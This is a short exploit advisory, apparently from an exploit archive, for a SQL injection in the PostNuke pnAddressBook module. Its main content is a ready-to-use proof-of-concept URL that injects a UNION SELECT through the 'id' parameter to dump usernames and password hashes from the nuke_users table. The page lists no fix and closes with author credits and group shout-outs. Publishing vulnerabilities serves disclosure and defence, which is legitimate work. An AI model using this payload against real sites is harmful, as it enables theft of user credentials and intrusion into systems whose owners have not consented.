PostNuke Module pnAddressbook SQL Injection Vulnerability

2012-01-19 16:15:05

# Exploit Title: PostNuke Module pnAddressbook SQL Injection Vulnerability
# Date: 1/18/2012
# Author: Robert Cooper ( Robert.Cooper [at] areyousecure.net )
# Tested on: [Linux/Windows 7]

#Vulnerable parameter:

id=


##############################################################
PoC:

http://server/index.php?module=pnAddressBook&func=viewDetail&formcall=edit&authid=2a630bd4b1cc5e7d03ef3ab28fb5e838&catview=0&sortview=0&formSearch=&all=1&menuprivate=0&total=78&page=1&char=&id=-46 union all select 1,2,3,group_concat(pn_uname,0x3a,pn_pass) FROM nuke_users--

##############################################################

www.areyousecure.net

www.websiteauditing.org


# Shouts to the Belegit crew

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.